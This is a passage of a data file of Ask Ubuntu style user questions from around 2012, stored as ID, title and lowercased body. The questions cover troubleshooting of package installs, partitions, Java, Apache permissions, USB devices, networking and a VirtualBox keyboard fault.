232998	how do i install smbmount ?	it seems that smbmount is not available in kubuntu 12.10 : - neptune ( ) : ~ $ smbmount //192.168.0.100/ samba/ -o rw smbmount : command not found - neptune ( ) : ~ $ apt-file search smbmount manpages-zh : /usr/share/man/zh_cn/man8/smbmount.8.gz manpages-zh : /usr/share/man/zh_tw/man8/smbmount.8.gz - neptune ( ) : ~ $ aptitude search smbmount - neptune ( ) : ~ $ furthermore , i can not seem to use smbfs to mount : - neptune ( ) : ~ $ sudo mount -t smbfs //192.168.0.100/ samba/ -o rw mount : unknown filesystem type 'smbfs' - neptune ( ) : ~ $ aptitude search smbfs - neptune ( ) : ~ $ any ideas how to continue ?
233000	i ca n't find partititions while installing xubuntu 12.10	i 'm running livecd xubuntu on windows 7 . once the installation begin , it shows : this computer currently has no detected operating system when i click on something else it shows me just one partition /dev/sda/ which own the whole space 320gb . when i try to modify it , this will erase all the data in the hdd and i really need it . when i enter in the terminal sudo fdisk -l it shows the following message : xubuntu @ xubuntu : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320071851520 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625140335 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d87ad device boot start end blocks id system /dev/sda1 * 63 97643069 48821503+ 7 hpfs/ntfs/exfat /dev/sda2 97656830 625141759 263742465 5 extended /dev/sda5 97656832 195309567 48826368 b w95 fat32 /dev/sda6 195311616 292964351 48826368 b w95 fat32 /dev/sda7 292966400 390619135 48826368 b w95 fat32 /dev/sda8 390621184 488273919 48826368 b w95 fat32 /dev/sda9 488275968 585928703 48826368 b w95 fat32 /dev/sda10 585938808 625121279 19591236 7 hpfs/ntfs/exfat /dev/sda11 585930752 585938744 3996+ 83 linux partition table entries are not in disk order
233001	failed to install a ruby gem , eventmachine	i attempts to run a script that prompt could not find gem 'eventmachine ( = 0.12.10 ) ruby ' in the gems available on this machine . run bundle install to install missing gems . then i runs sudo bundle install fetching gem metadata from http : //rubygems.org/ ... ... ... fetching gem metadata from http : //rubygems.org/.. using addressable ( 2.2.8 ) using ansi ( 1.4.3 ) using daemons ( 1.1.9 ) using data_objects ( 0.10.10 ) using dm-core ( 1.2.0 ) using dm-do-adapter ( 1.2.0 ) using dm-migrations ( 1.2.0 ) using do_sqlite3 ( 0.10.10 ) using dm-sqlite-adapter ( 1.2.0 ) installing eventmachine ( 0.12.10 ) with native extensions gem : :installer : :extensionbuilderror : error : failed to build gem native extension . /usr/bin/ruby1.9.1 extconf.rb checking for rb_trap_immediate in ruby.h , rubysig.h ... no checking for rb_thread_blocking_region ( ) ... yes checking for inotify_init ( ) in sys/inotify.h ... yes checking for writev ( ) in sys/uio.h ... yes checking for rb_thread_check_ints ( ) ... yes checking for rb_time_new ( ) ... yes checking for sys/event.h ... no checking for epoll_create ( ) in sys/epoll.h ... yes creating makefile make compiling page.cpp compiling sigs.cpp compiling files.cpp compiling emwin.cpp compiling cplusplus.cpp compiling pipe.cpp compiling kb.cpp kb.cpp : in member function ‘virtual void keyboarddescriptor : :read ( ) ’ : kb.cpp:79:27 : warning : ignoring return value of ‘ssize_t read ( int , void* , size_t ) ’ , declared with attribute warn_unused_result [ -wunused-result ] compiling rubymain.cpp rubymain.cpp : in function ‘value t_connect_server ( value , value , value ) ’ : rubymain.cpp:468:42 : error : format not a string literal and no format arguments [ -werror=format-security ] rubymain.cpp : in function ‘value t_bind_connect_server ( value , value , value , value , value ) ’ : rubymain.cpp:488:42 : error : format not a string literal and no format arguments [ -werror=format-security ] cc1plus : some warnings being treated as errors make : *** [ rubymain.o ] error 1 gem files will remain installed in /var/lib/gems/1.9.1/gems/eventmachine-0.12.10 for inspection . results logged to /var/lib/gems/1.9.1/gems/eventmachine-0.12.10/ext/gem_make.out an error occurred while installing eventmachine ( 0.12.10 ) , and bundler can not continue . make sure that `gem install eventmachine -v '0.12.10'` succeeds before bundling . finally , sudo gem install eventmachine -v '0.12.10' building native extensions . this could take a while ... error : error installing eventmachine : error : failed to build gem native extension . /usr/bin/ruby1.9.1 extconf.rb checking for rb_trap_immediate in ruby.h , rubysig.h ... no checking for rb_thread_blocking_region ( ) ... yes checking for inotify_init ( ) in sys/inotify.h ... yes checking for writev ( ) in sys/uio.h ... yes checking for rb_thread_check_ints ( ) ... yes checking for rb_time_new ( ) ... yes checking for sys/event.h ... no checking for epoll_create ( ) in sys/epoll.h ... yes creating makefile make compiling page.cpp compiling sigs.cpp compiling files.cpp compiling emwin.cpp compiling cplusplus.cpp compiling pipe.cpp compiling kb.cpp kb.cpp : in member function ‘virtual void keyboarddescriptor : :read ( ) ’ : kb.cpp:79:27 : warning : ignoring return value of ‘ssize_t read ( int , void* , size_t ) ’ , declared with attribute warn_unused_result [ -wunused-result ] compiling rubymain.cpp rubymain.cpp : in function ‘value t_connect_server ( value , value , value ) ’ : rubymain.cpp:468:42 : error : format not a string literal and no format arguments [ -werror=format-security ] rubymain.cpp : in function ‘value t_bind_connect_server ( value , value , value , value , value ) ’ : rubymain.cpp:488:42 : error : format not a string literal and no format arguments [ -werror=format-security ] cc1plus : some warnings being treated as errors make : * [ rubymain.o ] error 1 gem files will remain installed in /var/lib/gems/1.9.1/gems/eventmachine-0.12.10 for inspection . results logged to /var/lib/gems/1.9.1/gems/eventmachine-0.12.10/ext/gem_make.out ruby -v ruby 1.9.3p194 ( 2012-04-20 revision 35410 ) [ x86_64-linux ] i have already installed libeventmachine-ruby and ruby-eventmachine
233002	intel/ati hybrid graphics card query	i am using 12.04 and i followed this tutorial to install the intel/ati ( 3000/6490m ) hybrid graphics on my ubuntu . i desparately want to try 12.10 and the coming 13.04 and when i see there is no perfect solution to make the hybrid cards work i feel frustated . i have to wait months before the someone gives the solution . can anyone tell me why there is no driver support for ati/intel cards and if they will be supported in future releases . i really want to upgrade the system . is there any hope ?
233008	java installation ( or apt-get ? ) problem	two weeks ago i made several successful java installations without any problem following link http : //www.ubuntugeek.com/how-to-install-oracle-java-7-in-ubuntu-12-04.html but today i faced a problem . i was running standard apt-get update command , and faced warning message : root @ myname : ~ # add-apt-repository ppa : webupd8team/java you are about to add the following ppa to your system : oracle java ( jdk ) installer ( automatically downloads and installs oracle jdk6 / jdk7 / jdk8 ) . there are no actual java files in this ppa . more info : http : //www.webupd8.org/2012/01/install-oracle-java-jdk-7-in-ubuntu-via.html more info : https : //launchpad.net/~webupd8team/+archive/java press [ enter ] to continue or ctrl-c to cancel adding it after pressing [ enter ] , download of packages where stuck on ~90 % . message that confused me was there are no actual java files in this ppa . does it means that ppa has been changed in last few days ? can you help me how to solve this problem and install java as i did two weeks ago ?
233012	`` operation is not supported '' when creating a bootable usb on mac	the command i 'm using is : sudo dd if=/users/ben/desktop/ubuntu-12.10-desktop-i386.dmg of=/dev/disk2 bs=1m it then says that the operation is not supported .
233013	install ubuntu from internal hdd	what 's the best way to install ubuntu on an old laptop that only boots from cd ( not dvd ) or hdd ? i ca n't install from dvd or usb . is there a way to transfer the hdd to another computer and create an install file , then transfer it to the laptop i want to install ubuntu and boot from the transferred hard drive . there is no os on the laptop .
233019	how to uninstall gnustep ?	in a fit of command line joy , i went about installing some programs . i tried to install the 'say ' command ( like darwin has ) , and installed whatever program ubuntu recommended -- unfortunately , without writing it down . it ended up not being the right one , and i 'm pretty sure i downloaded gnustep -- there 's not a folder in my home directory , and if i delete it and run 'say ' again , it recreates and creates an 'installed-software.txt ' file . how do i uninstall gnustep , and stop this from happening ?
233025	lock zend studio to launcher/dash gnome shell	i am using zend studio in gnome shell and i can launch zend studio from the folder binary file , but i do n't get the option to lock it to the dash as a favorite . any idea on how i can go about doing that ? thanks .
233031	accidentally changed permissions of /opt , how to undo ?	i have accidently unlocked a system file with the command : sudo chmod 777 /opt does anyone know how to undo this action or to lock it again ?
233032	lightdm-too many desktop envirements	today i tried to play with lxde . after installing i go to login screen and try to select lxde from list of avaible de , but i ca n't select ok after that . . i know this is bug , but maybe somebody can help me with finding temporary solution . ps . this in in launchpad bugs , but it looks abbadoned . ps2 . im am using ubuntu 12.10 , my screen is 1920x108 .
233034	my ubuntu disks wo n't boot . what am i doing wrong	i have been using linux disks that i have received in magazines and now i want to get a 64 bit version of xubuntu 12.10 ( the magazine came with xubuntu 12.04 32bit ) . so making a disk should be this easy right ? download .iso then burn it to a dvd . after that boot it into the computer using bios . when i go to do this the drive starts to read the disk , then it stops.it does not work it just goes directly back to my old os ( ubuntu 12.04 ) . am i doing something wrong ? i put the write speed at 2.4x which is the slowest my burner goes . i thought that would fix the issue , but no .
233037	how to install sun java jdk 6 on ubuntu ?	the issue has been posted in various sites , but did n't get any of them working for me . who can help me ? i followed the instructions at https : //help.ubuntu.com/community/java for java 6 . ubuntu version 12.10 downloaded jdk-6u37-linux-x64.bin chmod u+x jdk-6u37-linux-x64.bin ./jdk-6u37-linux-x64.bin ./jdk-6u37-linux-x64.bin : 1 : ./jdk-6u37-linux-x64.bin : can not open html : no such file ./jdk-6u37-linux-x64.bin : 2 : ./jdk-6u37-linux-x64.bin : can not open head : no such file ./jdk-6u37-linux-x64.bin : 3 : ./jdk-6u37-linux-x64.bin : can not open title : no such file ./jdk-6u37-linux-x64.bin : 3 : ./jdk-6u37-linux-x64.bin : request : not found ./jdk-6u37-linux-x64.bin : 4 : ./jdk-6u37-linux-x64.bin : can not open meta : no such file ./jdk-6u37-linux-x64.bin : 5 : ./jdk-6u37-linux-x64.bin : can not open link : no such file ./jdk-6u37-linux-x64.bin : 6 : ./jdk-6u37-linux-x64.bin : can not open link : no such file : not foundlinux-x64.bin : 7 : ./jdk-6u37-linux-x64.bin : ./jdk-6u37-linux-x64.bin : 8 : ./jdk-6u37-linux-x64.bin : can not open body : no such file ./jdk-6u37-linux-x64.bin : 9 : ./jdk-6u37-linux-x64.bin : can not open div : no such file ./jdk-6u37-linux-x64.bin : 10 : ./jdk-6u37-linux-x64.bin : can not open table : no such file ./jdk-6u37-linux-x64.bin : 11 : ./jdk-6u37-linux-x64.bin : can not open tr : no such file ./jdk-6u37-linux-x64.bin : 12 : ./jdk-6u37-linux-x64.bin : syntax error : redirection unexpected what else should i do to get this working ? i 'm pretty new to linux world . my project requires jdk 6x rather than the latest 7 .
233046	how to give my user permission to add/edit files on local apache server ?	i 'm setting up my local test server again , and i seem to have forgotten how to successfully set up the lamp server . i have installed lamp server via tasksel command and i have configured the /var/www directory according to a guide i 've found : after the lamp server installation you will need write permissions to the /var/www directory . follow these steps to configure permissions . add your user to the www-data group sudo usermod -a -g www-data < your user name > now add the /var/www folder to the www-data group sudo chgrp -r www-data /var/www now give write permissions to the www-data group sudo chmod -r g+w /var/www so logan user is now part of www-data group and the file/folder permissions look like the output below : logan @ computer : /var/www $ ls -lart total 172 -rw-r -- r -- 1 www-data www-data 1997 oct 23 2010 wp-links-opml.php -rw-r -- r -- 1 www-data www-data 3177 nov 1 2010 wp-config-sample.php -rw-r -- r -- 1 www-data www-data 3700 jan 8 2012 wp-trackback.php -rw-r -- r -- 1 www-data www-data 271 jan 8 2012 wp-blog-header.php -rw-r -- r -- 1 www-data www-data 395 jan 8 2012 index.php -rw-r -- r -- 1 www-data www-data 3522 apr 10 2012 wp-comments-post.php -rw-r -- r -- 1 www-data www-data 19929 may 6 2012 license.txt -rw-r -- r -- 1 www-data www-data 18219 sep 11 08:27 wp-signup.php -rw-r -- r -- 1 www-data www-data 2719 sep 11 16:11 xmlrpc.php -rw-r -- r -- 1 www-data www-data 2718 sep 23 12:57 wp-cron.php -rw-r -- r -- 1 www-data www-data 7723 sep 25 01:26 wp-mail.php -rw-r -- r -- 1 www-data www-data 2408 oct 26 15:40 wp-load.php -rw-r -- r -- 1 www-data www-data 4663 nov 17 10:11 wp-activate.php -rw-r -- r -- 1 www-data www-data 9899 nov 22 04:52 wp-settings.php -rw-r -- r -- 1 www-data www-data 9175 nov 29 19:57 readme.html -rw-r -- r -- 1 www-data www-data 29310 nov 30 08:40 wp-login.php drwxr-xr-x 14 root root 4096 dec 24 17:41 .. drwx -- -- -- 9 www-data www-data 4096 dec 26 16:11 wp-admin drwx -- -- -- 9 www-data www-data 4096 dec 26 16:11 wp-includes -rw-rw-rw- 1 www-data www-data 3448 dec 26 16:14 wp-config.php drwxrwxr-x 5 www-data www-data 4096 dec 26 16:14 . drwx -- -- -- 6 www-data www-data 4096 dec 26 16:19 wp-content things work perfectly at http : //localhost , i can view the website fine . the thing with this is that i will be working on a plugin for wordpress and i do n't want to deal with separate owners under www directory to create or modify files/folders . when i give my user the ownership of /var/www recursively as logan : www-data i can create/modify files but can not view the http : //localhost . i get a forbidden error . i 'm assuming that this is because of the apache 's configuration ? which one is healthier or easier considering this is just a local test website , configuring apache to give user logan to view website and chmod /var/www logan : logan so that i can create files etc . without any sudo commands ; or is it easier to configure user groups to get www-data user to act like my logan user ? ( idk how that 's possible , maybe putting www-data user under logan group ? ) please shed some light to this subject . all i want is to be able to create/modifiy files under my user , and yet to be able to successfully view http : //localhost i appreciate the help !
233052	ubuntu 12.04 lts installer support for fake raid 1	i want to install ubuntu 12.04 lts alongside windows 7 . should not be a big problem , but it just occurred to me that i am using a software raid to mirror my disks ( raid 1 ) . now there is some information on about that , but most of it is pretty old by now . it basically says that i have to boot into the live system and install dmraid . afterwards i have to configure a whole bunch of stuff ( i did not understand it really ) . pretty complicated . on the other hand someone mentioned ( ca n't find the source anymore though ) that the installer of newer versions of ubuntu should recognize that i have fake raid set up and handle that automatically . is that true ? does the information i have found in the ubuntu documentation still apply to 12.04 ? what things do i have to consider during the installation process ? thanks for your help .
233060	recording speaker audio using avconv	i 'm having some problems recording the audio from my speakers using avconv . this is the command i type into the terminal : avconv -f alsa -i pulse -f x11grab -r 30 -s 1920*1080 -i :0.0 -vcodec libx264 -preset ultrafast -ab 320k -threads 8 screen.mkv the problem : avconv is recording the speaker audio and my microphone audio , however the speaker audio is extremely low . i 've tried playing around with all of my audio/volume levels and i ca n't seem to get avconv to pickup the speaker audio better . is there an option for the avconv command that is for speaker audio ? please do not reply with `` use gtk-recordmydesktop '' or `` kazam '' , i find avconv much more convenient . any help is appreciated , thanks !
233061	apt-get upgrade stuck on postgresql dependency	i ran sudo apt-get upgrade on my 12.04 server , and i have become stuck with a postgresql dependency . the console output ( of sudo apt-get -f install ) is below : dpkg : dependency problems prevent configuration of postgresql-9.1 : postgresql-client-9.1 ( 9.1.7-0ubuntu12.04 ) breaks postgresql-9.1 ( < < 9.1.7-0ubuntu12.04 ) and is installed . version of postgresql-9.1 to be configured is 9.1.6-1~precise2 . dpkg : error processing postgresql-9.1 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : postgresql-9.1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i resolve this issue ? nb . i have a production database running on this server , so purge/reinstall of postgres is a last resort . edit : as requested , the output of apt-get update : http : //paste.ubuntu.com/1469631/
233063	cheese config file location	i would like to do a fresh install of cheese . i have purge-removed the package and re-installed but when i open up cheese it has my old settings . where are the cheese config files located ? i would like to remove the cheese config file and i have tried searching for the config file in my home directory with ~ $ find -name '*cheese*' but i still ca n't find it . i am running ubuntu 12.10 .
233064	why am i getting `` command 'deb ' not found '' ?	i have come across several installation instructions that include the command deb . but it appears that this command is not available on my installation . where can i get this command ? is there a work-around ?
233065	how do i subscribe to rss feeds in firefox with google reader ?	why wo n't firefox subscribe to some feeds with google reader ? some rss feeds default to firefox `` live bookmarks '' yet give google reader as an option , others default to google reader , other types of feeds do not give google reader as an option . the firefox knowledge base is a bit sketchy on the details : you can choose different options for subscribing to web feeds , including `` add live bookmarks in firefox '' , from `` tools - > options - > applications '' , by clicking on `` web feed '' in the list of content types and choosing an option from the drop-down menu . the `` application '' i would like to add is google reader , which is n't an `` application '' in the way i think of it ( i perceive google reader as a website or service , an online aggregator ) . i would like for all and any rss or atom content type to be handled by google reader . how do i add google reader as an `` application '' ? in this screenshot from the web : there 's a drop-down menu , one of the options being `` live bookmarks '' . sometimes google or yahoo are options , additionally there 's an option to `` choose application . '' for those times when google is n't in the menu , there should be a way to add google reader as an `` application '' for handling rss feeds . i know google makes an extension so i can do this with a separate toolbar button , but i 'm asking how to do add google reader as an `` application '' . the google reader toolbar button will add any type of feed .
233068	run conky over lightdm	is it possible to have my conky gadgets run over my lightdm login screen ? if so , how would i go about this ? i saw someone doing it with xdm under debian in this screenshot from a thread on the archlinux forums
233077	full disk encryption - separate home partition	how to create separate /home partition when using full disk encryption feature in the ubuntu 12.10 installer ?
233079	struct kernel_stat has no member named cpustat	i am trying to get my dlink dwa 130 wireless usb stick working on my new install of linux 12.10 . from reading online ( i know very little about linux , i use red hat at work occasionally ) it seemed i should install ndiswrapper . i kept getting the error `` module not found '' , and while following these instructions i am getting the following error : /usr/src/modules/ndiswrapper/ndis.c:2657:24 : error : ‘struct kernel_stat’ has no member named ‘cpustat’ /usr/src/modules/ndiswrapper/ndis.c:2658:31 : error : ‘struct kernel_stat’ has no member named ‘cpustat’ /usr/src/modules/ndiswrapper/ndis.c:2659:17 : error : ‘struct kernel_stat’ has no member named ‘cpustat’ make [ 2 ] : *** [ /usr/src/modules/ndiswrapper/ndis.o ] error 1 make [ 1 ] : *** [ _module_/usr/src/modules/ndiswrapper ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-21-generic' make : *** [ modules ] error 2 how do i fix this ? as i said , i do not know much about linux , i am a wondows user primarily .
233082	could i possibly mount the lubuntu iso in windows xp ?	wubi gives me errors when installing and i do n't have a disk drive , so i was wondering if i could mount the iso to the hard drive . is there a tool for doing that , and would i encounter any problems , like missing grub boot manager ? if i was missing it , how would i install it ? would there be any other things to install ?
233087	how to install request tracker on ubuntu 12.04 server ?	i want to install request tracker ( rt ) . how can i do this ?
233093	how can i make vlc bind to all interfaces for streaming , but only loopback for the telnet interface ?	the example from the documentation is : vlc -- ttl 12 -vvv -- color -i telnet -- telnet-password videolan -- rtsp-host 0.0.0.0:5554 this , however , binds to all interfaces . i would prefer not to mess with ipchains/iptables , but force it to only bind on loopback . this would make it easier to manage from an automation of deployment perspective .
233096	why does ubuntu desktop require geoip-database ?	i was watching my 13.04 vm update , and i noticed that it wanted to update the geoip-database package . i have verified that it is present on my 12.10 computer as well - what does ubuntu desktop use this for ?
233100	is ubuntu a distro with nautilus included ?	this is what i 'm told to download `` you will need a working linux distro with nautilus '' . i 've never used linux and know nothing about it . i 've got a windows 8 on my computer . do i make this a dual boot system , and can i install it to a usb 3 32gig flash drive and run it from that ?
233102	how do i connect to password protected servers in nautilus 3.6 ?	i am trying to manage my android device with davdrive lite , which hosts a local file server . the `` connect to server '' dialog box in nautilus 3.6 does n't have the option to type a username and password . it looks like this :
233107	skype crashing when other contact logs on	i was in a video call with someone , and i would receive a notification that somebody else has logged on . a second or so later , skype would crash . i have checked for updates , and there were none . please help !
233113	what would be the command line equivalent of `` always on top '' option on windows ?	the question says it all really , is there a command that emulates always on top that you get by right clicking on window borders ?
233121	how to install ubuntu on nintendo wii	hey i would like to install ubuntu on a nintendo wii . i am using letterbomb to jailbreak and install the homebrew channel . how would i boot ubuntu afterwards ?
233131	copying installed software from ubuntu 12.04 to ubuntu 12.04 cd	i have downloaded some software via the ubuntu software center and i would like to copy this software to an ubuntu cd . is that possible ? if so , how would i do that ?
233132	hide user accounts	is there away to hide specific user accounts from the login screen and the drop down menu on the desktop menu , i 'm running ubuntu 12.04 ( precise )
233133	why ubuntu uses more battery power ?	why ubuntu uses more battery power than windows ? when i use windows , my battery lasts for 2 hours but when i use ubuntu , the battery decreases so quickly . hardly i can use for only 1 hour . why ubuntu uses more battery ?
233135	why are windows going to top left of the screen ?	recently i noticed all the new windows are popping up in the top left . this is annoying because the top bar blocks the title bar of the new window . see screenshot of tunesviewer with firefox , tunesviewer ca n't be moved without alt-drag trick .
233136	dual boot ubuntu and windows 8 on hp p7-1449	so i recently bought a hp p7-1449 with windows 8 pre-installed . i want to dual boot the system with ubuntu 12.10 and keep windows 8 too . i have ubuntu 12.10 on a dvd bt when i try to boot from it it just goes straight to windows 8 or says preparing automatic repair and just stays there until i manually reboot the system . i 've tried disabling secure boot and fast boot and enabling legacy support but the outcome is the same and it does n't work . any suggestions ?
233138	software center requires libkonq5-templates package	whenever i open software center it crashes with below error . i am running ubuntu 12.10 . e : the package libkonq5-templates needs to be reinstalled but i ca n't find an archive for it . could you please help me ?
233140	how to access vmware esxi server from ubuntu 12.04.1	i want to take control of my vmware esxi 5 server through ubuntu 12.04.1 desktop . unfortunately there is no client available for ubuntu . how can i do it ?
233143	problems with install ( live cd and alt ver . install )	i get into the live cd and get about halfway through installation ( downloading packages ) and keep receiving the message installation failed . when i use the alt version i get all the way to the point where its the select and install step , it gets about 15 percent of the way through and fails . when i select install grub bootloader this fails as well . the type of computer i am installing it on is a dell dimension xps . i have downloaded and burned multiple copies of the ubuntu and lubuntu os and ran several different disk checks as well as md5 checksums to insure the copies i am downloading and burning are complete . now for my question , i am stumped on how to solve this any ideas/solutions ? also the video card i have in the system is this right here ( http : //www.newegg.com/product/product.aspx ? item=n82e16814161337 i have no clue as to whether this might help or not ) i have tried version 9.10 , 12.10 of ubuntu and 12.10 of lubuntu to no avail .
233146	proxy sharing between host and guest in virtualbox	i installed ubuntu 12.4 in virtualbox with windows vista host which uses a proxy . i did not configure proxy settings in ubuntu but internet is working fine and so are updates . now , my host browsers in which i had configured manual proxy are also working with no proxy . youtube and facebook were blocked but are now working . i am happy with this but can not understand how it happened ? anyone can clear this ?
233150	the action would require the installation of packages from not authenticated sources	ă 5207 the action would require the installation of packages from not authenticated sources . mplayer-gui mplayer-skins from the ubuntu software center i could not watch any .avi without it , and rest of the software also require some packages to watch .avi which is impossible to get ? thanks in nadvance
233152	i used fixparts and lost my backup parts.txt !	i 'm using xubuntu 12.10 live . while installing it did n't detect the rest of partitions , even gparted did n't detect them . i used fixparts : www.rodsbooks.com/fixparts in order to fix this . i made the backup parts.txt inside the hard disk . i made a mistake so when i write sudo fdisk -l in terminal it shows : xubuntu @ xubuntu : ~ $ sudo fdisk -l fdisk : unable to seek on /dev/sda : invalid argument and even when i 'm trying to boot my windows it shows me that everything is deleted . i ca n't access everything except the bios and the livecd ... please
233153	usb ports not responding in xubuntu 12.04	i 'm running xubuntu 12.04 on an asus x83v laptop and a couple days ago , all my usb ports stopped responding , with neither my mouse nor flash drives or any usb devices responding . when i connect my phone to any usb port it does charge , but does not connect to my laptop . the same goes with my mouse , which lights up but does n't respond . my lsusb output with or without any devices connected is : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub running dmesg gives me the following recurring output : [ 125505.972198 ] hub 8-0:1.0 : unable to enumerate usb device on port 1 [ 125507.896116 ] hub 2-0:1.0 : connect-debounce failed , port 1 disabled [ 125509.816165 ] hub 2-0:1.0 : connect-debounce failed , port 2 disabled [ 125510.128196 ] hub 7-0:1.0 : unable to enumerate usb device on port 2 [ 125512.048136 ] hub 2-0:1.0 : connect-debounce failed , port 1 disabled [ 125513.968164 ] hub 2-0:1.0 : connect-debounce failed , port 2 disabled [ 125514.152160 ] hub 8-0:1.0 : unable to enumerate usb device on port 1 [ 125516.076064 ] hub 2-0:1.0 : connect-debounce failed , port 1 disabled [ 125517.996146 ] hub 2-0:1.0 : connect-debounce failed , port 2 disabled [ 125518.308109 ] hub 7-0:1.0 : unable to enumerate usb device on port 2 [ 125520.228063 ] hub 2-0:1.0 : connect-debounce failed , port 1 disabled [ 125522.148148 ] hub 2-0:1.0 : connect-debounce failed , port 2 disabled [ 125522.332195 ] hub 8-0:1.0 : unable to enumerate usb device on port 1 [ 125522.644068 ] hub 7-0:1.0 : unable to enumerate usb device on port 2 [ 125526.168137 ] hub 2-0:1.0 : connect-debounce failed , port 2 disabled [ 125526.480203 ] hub 7-0:1.0 : unable to enumerate usb device on port 2 [ 125526.720130 ] usb 8-1 : new full-speed usb device number 51 using uhci_hcd [ 125527.128105 ] usb 8-1 : device not accepting address 51 , error -71 [ 125527.240157 ] usb 8-1 : new full-speed usb device number 52 using uhci_hcd [ 125527.648158 ] usb 8-1 : device not accepting address 52 , error -71 [ 125527.760051 ] usb 8-1 : new full-speed usb device number 53 using uhci_hcd [ 125527.824202 ] hub 8-0:1.0 : unable to enumerate usb device on port 1 [ 125529.748164 ] hub 2-0:1.0 : connect-debounce failed , port 1 disabled [ 125531.668058 ] hub 2-0:1.0 : connect-debounce failed , port 2 disabled [ 125531.980148 ] hub 7-0:1.0 : unable to enumerate usb device on port 2 [ 125532.164198 ] hub 8-0:1.0 : unable to enumerate usb device on port 1 [ 125534.084123 ] hub 2-0:1.0 : connect-debounce failed , port 1 disabled [ 125536.004170 ] hub 2-0:1.0 : connect-debounce failed , port 2 disabled [ 125536.316167 ] hub 7-0:1.0 : unable to enumerate usb device on port 2 [ 125538.240057 ] hub 2-0:1.0 : connect-debounce failed , port 1 disabled [ 125540.160128 ] hub 2-0:1.0 : connect-debounce failed , port 2 disabled [ 125540.400157 ] usb 8-1 : new full-speed usb device number 55 using uhci_hcd [ 125540.808153 ] usb 8-1 : device not accepting address 55 , error -71 i 'm running kernel 3.2.0-34-generic and have tried updating it to 3.6 but to no avail . sos ?
233154	how can i make the scanner of a canon e500 work ?	10 years ago i thought i made a big mistake when i bought my laser lbp800 . getting it to work with ubuntu was disastrous . now , 10 years later , i thought things had improved . so i got this canon e500 ( scanner + printer ) . but i was wrong ! it 's still disaster ! i got the printing going with a download from here : http : //support-in.canon-asia.com/contents/in/en/0100396801.html however , i can not get the scanner to work . i have no clue on how this should be done . is there anyone who has successfully got the whole thing running ? thanks a million !
233155	i cant connect to my home wifi in ubuntu 12.04	as it is a wpa , wpa2 personal connection but i cant change it in the network wireless setting ... it keeps on coming as a wep connection but when i type my network password the connect button on bottom of dialog box fades out.but when i add some more characters it fades in but with the correct password only we can connect so its useless..as i 'm new to linux and want to be a linux user i expect answes from the pros ...
233156	network profiles in ubuntu 12.04	i use a wired connection at home and in college . but at home i set my ipv4 settings to automatic dhcp whereas in college i need to manually enter the ip address , subnet and gateway and i also need to change proxy settings . so whenever i go home , i need to change system settings to no proxy and also need to change the ip address settings , and when i go to college , i need to enter an automatic configuration url in the proxy settings and manual tcp/ip configurations . is there anyway i can combine these 2 processes , so that when i connect to a wired network in college , my proxy settings are set according to what i need in college and similarly at home . is it possible to extend this automation to wireless networks also ? it will be really helpful for me .
233157	how do i block an ip using hosts.deny with a non-default program ?	i 'm new to all of this . i 'm running ubuntu 12.10 x64 . i recently wrote a program in c++ that accepts tcp connections on port 57370 , and it is running as a daemon ( i used this guide ) . it 's not very complicated ; it just waits for connections and reads a line . however , somebody keeps sending binary garbage to my server on this port , and i logged that person 's ip address . i added the ip to my /etc/hosts.deny file ( the line was all : ip_address ) , but it does n't seem to do anything . i made sure to put a newline after it . i am still seeing connections from this person , and this person still manages to waste my server 's bandwidth . i read online that i have to register my program as a daemon in order to use hosts.deny , but how would i do that ? should i just use ufw instead ? any and all help would be appreciated .
233158	can not delete files containing special characters in the file name	i use ubuntu 9.10 ( karmic ) and i have a directory with many files , among them these two files : ./baer.jpg ./b채r.jpg i would like to delete b채r.jpg but i ca n't . if i type rm b and hit tab , it shows me both files , if i append 채 and hit tab , nothing gets displayed . what must be done in order to delete b채r.jpg ? deleting the parent folder is not a solution for me , as there are plenty of files in this directory that are used by a productive environment .
233162	configuring ipsec-tools on ubuntu - esp/udp	i 'm trying to configure ipsec-tools to work with esp over udp mode . i 've found a configuration file here in ubuntu forums . can anyone help with configuring it to esp/udp mode ? thanks in advance !
233165	how can i make a bootable usb drive to replace windows ?	i am receiving this error message when i try to move ubuntu to my usb drive to boot off of it to replace windows : could not move syslinux files in '/media/sasha/da74-e37f ' : [ errno 2 ] no such file or directory . maybe /media/disk is not an ubuntu image ? is this is an issue with my computer or a missing function within ubuntu ?
233166	how to fix an error relating to no keyboard input accepted in gnome desktop , though keycode shows scancodes ?	running ubuntu 11.04 x86 guest under virtualbox 4.2.6 in a win7 x64 host . bear with me ... this is a strange one . once booted into ubuntu nothing inside the ubuntu guest seems to recognize keyboard input : login screen , gnome terminal , gedit , etc . i ca n't use alt+tab to switch between windows , ca n't switch between workspaces using the keyboard . mouse works as expected . i ca n't enter virtual console ( terminals ) via ctrl+alt+f1 through to f7 , etc . nothing . the keyboard does work while inside grub , however . everything 's been working fine for a long time ( been using this guest under various versions of virtualbox for well over a year , no problems - and upgraded to vb 4.2.6 at least a week ago . ) at some point today , virtualbox crashed ( yeah , this happens on occasion ) . i restarted the guest , and the keyboard input was no longer working . this is the first time this has happened . the virtual keyboard on the logon screen does work , and once logged in , i can paste text from the virtualbox host clipboard to enter commands in the gnome terminal bash shell . so , running sudo showkey in gnome terminal ( by pasting in the command and my password ) shows scan codes making their way into the guest when i press various keys : $ sudo showkey [ sudo ] password for inactivist : kb mode was raw [ if you are trying this under x , it might not work since the x server is also reading /dev/console ] press any key ( program terminates 10s after last keypress ) ... keycode 30 press keycode 30 press keycode 30 press keycode 31 press ... this is very strange . nothing in the ubuntu guest responds to keystrokes or input , yet the system sees scan codes when i press keys while showkey is running . i 've searched for hours on ubuntu 